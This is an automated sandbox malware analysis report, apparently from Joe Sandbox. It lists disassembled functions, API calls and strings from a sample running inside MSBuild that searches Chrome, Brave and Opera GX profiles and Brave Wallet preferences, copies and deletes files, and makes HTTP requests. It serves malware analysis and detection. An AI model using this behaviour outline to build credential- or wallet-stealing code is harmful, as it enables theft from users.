                                                                                                                                                                                                                      control_flow_graph 1787 409d1c-409dd5 call 4104e7 call 4105c7 call 410609 call 41058d call 402920 * 2 call 4104e7 * 2 FindFirstFileA 1804 40a788-40a7d7 call 402920 * 3 call 401cde call 402920 * 3 call 41d016 1787->1804 1805 409ddb-409def StrCmpCA 1787->1805 1806 40a761-40a776 FindNextFileA 1805->1806 1807 409df5-409e09 StrCmpCA 1805->1807 1806->1805 1810 40a77c-40a782 FindClose 1806->1810 1807->1806 1809 409e0f-409e85 call 410549 call 4105c7 call 410609 * 2 call 41058d call 402920 * 3 1807->1809 1842 409e8b-409ea1 StrCmpCA 1809->1842 1843 409f8e-40a002 call 410609 * 4 call 41058d call 402920 * 3 1809->1843 1810->1804 1844 409ea3-409f13 call 410609 * 4 call 41058d call 402920 * 3 1842->1844 1845 409f18-409f8c call 410609 * 4 call 41058d call 402920 * 3 1842->1845 1894 40a008-40a01d call 402920 StrCmpCA 1843->1894 1844->1894 1845->1894 1897 40a023-40a037 StrCmpCA 1894->1897 1898 40a1ef-40a204 StrCmpCA 1894->1898 1897->1898 1901 40a03d-40a173 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA call 4104e7 call 410609 * 2 call 41058d call 402920 * 2 call 410519 call 407fac 1897->1901 1899 40a206-40a249 call 401cfd call 410519 * 3 call 40852e 1898->1899 1900 40a259-40a26e StrCmpCA 1898->1900 1962 40a24e-40a254 1899->1962 1904 40a270-40a281 StrCmpCA 1900->1904 1905 40a2cf-40a2e9 call 410519 call 411d92 1900->1905 2083 40a175-40a1b3 call 401cfd call 410519 call 416e97 call 402920 1901->2083 2084 40a1b8-40a1ea DeleteFileA call 402920 * 3 1901->2084 1909 40a6d0-40a6d7 1904->1909 1910 40a287-40a28b 1904->1910 1932 40a2eb-40a2ef 1905->1932 1933 40a34f-40a364 StrCmpCA 1905->1933 1913 40a731-40a75b call 402920 * 2 1909->1913 1914 40a6d9-40a726 call 401cfd call 410519 * 2 call 4104e7 call 409d1c 1909->1914 1910->1909 1916 40a291-40a2cd call 401cfd call 410519 * 2 1910->1916 1913->1806 1978 40a72b 1914->1978 1960 40a335-40a33f call 410519 call 40884c 1916->1960 1932->1909 1942 40a2f5-40a32f call 401cfd call 410519 call 4104e7 1932->1942 1938 40a546-40a55b StrCmpCA 1933->1938 1939 40a36a-40a426 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 1933->1939 1938->1909 1947 40a561-40a61d call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 1938->1947 2038 40a4b9-40a4c9 StrCmpCA 1939->2038 2039 40a42c-40a4b3 call 401cfd call 410519 * 3 call 408ddb call 401cfd call 410519 * 3 call 409549 1939->2039 1942->1960 2042 40a623-40a69e call 401cfd call 410519 * 3 call 409072 call 401cfd call 410519 * 3 call 4092a7 1947->2042 2043 40a6a4-40a6b6 DeleteFileA call 402920 1947->2043 1985 40a344-40a34a 1960->1985 1962->1909 1978->1913 1985->1909 2045 40a4cb-40a516 call 401cfd call 410519 * 3 call 409a0e 2038->2045 2046 40a51c-40a52e DeleteFileA call 402920 2038->2046 2039->2038 2042->2043 2057 40a6bb-40a6c2 2043->2057 2045->2046 2056 40a533-40a541 2046->2056 2062 40a6c9-40a6cb call 402920 2056->2062 2057->2062 2062->1909 2083->2084 2084->1898
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0EF
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040A1BE
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040A266
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A41C
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                                                                                                                                                        • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
                                                                                                                                                                                                                        • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                                                                                                                                                        • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                                                                                                                                                        • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A613
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 0040A76E
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0040A782
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                                                                      • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                                      • API String ID: 4173076446-1189830961
                                                                                                                                                                                                                      • Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                                                                                                                      • Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89
                                                                                                                                                                                                                      Function 6C8835A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 2567 6c8835a0-6c8835be 2568 6c8838e9-6c8838fb call 6c8bb320 2567->2568 2569 6c8835c4-6c8835ed InitializeCriticalSectionAndSpinCount getenv 2567->2569 2571 6c8838fc-6c88390c strcmp 2569->2571 2572 6c8835f3-6c8835f5 2569->2572 2571->2572 2574 6c883912-6c883922 strcmp 2571->2574 2575 6c8835f8-6c883614 QueryPerformanceFrequency 2572->2575 2576 6c88398a-6c88398c 2574->2576 2577 6c883924-6c883932 2574->2577 2578 6c88361a-6c88361c 2575->2578 2579 6c88374f-6c883756 2575->2579 2576->2575 2581 6c883622-6c88364a _strnicmp 2577->2581 2584 6c883938 2577->2584 2580 6c88393d 2578->2580 2578->2581 2582 6c88375c-6c883768 2579->2582 2583 6c88396e-6c883982 2579->2583 2586 6c883944-6c883957 _strnicmp 2580->2586 2585 6c883650-6c88365e 2581->2585 2581->2586 2587 6c88376a-6c8837a1 QueryPerformanceCounter EnterCriticalSection 2582->2587 2583->2576 2584->2579 2588 6c88395d-6c88395f 2585->2588 2589 6c883664-6c8836a9 GetSystemTimeAdjustment 2585->2589 2586->2585 2586->2588 2590 6c8837b3-6c8837eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2587->2590 2591 6c8837a3-6c8837b1 2587->2591 2592 6c8836af-6c883749 call 6c8bc110 2589->2592 2593 6c883964 2589->2593 2594 6c8837fc-6c883839 LeaveCriticalSection 2590->2594 2595 6c8837ed-6c8837fa 2590->2595 2591->2590 2592->2579 2593->2583 2597 6c88383b-6c883840 2594->2597 2598 6c883846-6c8838ac call 6c8bc110 2594->2598 2595->2594 2597->2587 2597->2598 2602 6c8838b2-6c8838ca 2598->2602 2603 6c8838cc-6c8838db 2602->2603 2604 6c8838dd-6c8838e3 2602->2604 2603->2602 2603->2604 2604->2568
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C90F688,00001000), ref: 6C8835D5
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C8835E0
                                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 6C8835FD
                                                                                                                                                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C88363F
                                                                                                                                                                                                                      • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C88369F
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C8836E4
                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6C883773
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F688), ref: 6C88377E
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C8837BD
                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6C8837C4
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8837CB
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C883801
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C883883
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C883902
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C883918
                                                                                                                                                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C88394C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                      • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                      • API String ID: 301339242-3790311718
                                                                                                                                                                                                                      • Opcode ID: 2eeeb78bc219a471b044577d19adc914854dfc22b30009f94ba5b0391bd2d4c1
                                                                                                                                                                                                                      • Instruction ID: 09744093eabb02b0c562ffef102494ab0f1fb4850f47c3a6e8f12bafa3870999
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2eeeb78bc219a471b044577d19adc914854dfc22b30009f94ba5b0391bd2d4c1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1B1A271B093149BDB18DF28C94461ABBF5BB8A708F248A2DE899D3750D770DD018B85
                                                                                                                                                                                                                      Function 00415FD1 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                                                      • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                      • API String ID: 2178766154-445461498
                                                                                                                                                                                                                      • Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                                                                                                                      • Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94
                                                                                                                                                                                                                      Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                                                                                                                        • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                                                                                                                        • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                                                                                                                        • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                                                                                                                        • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                                                                                                                                                        • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                                                                                                                        • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00411949
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                      • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                                      • API String ID: 2280294774-461178377
                                                                                                                                                                                                                      • Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                                                                                                                      • Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28
                                                                                                                                                                                                                      Function 0041C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: /$UT
                                                                                                                                                                                                                      • API String ID: 0-1626504983
                                                                                                                                                                                                                      • Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                                                                                                                      • Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99
                                                                                                                                                                                                                      Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
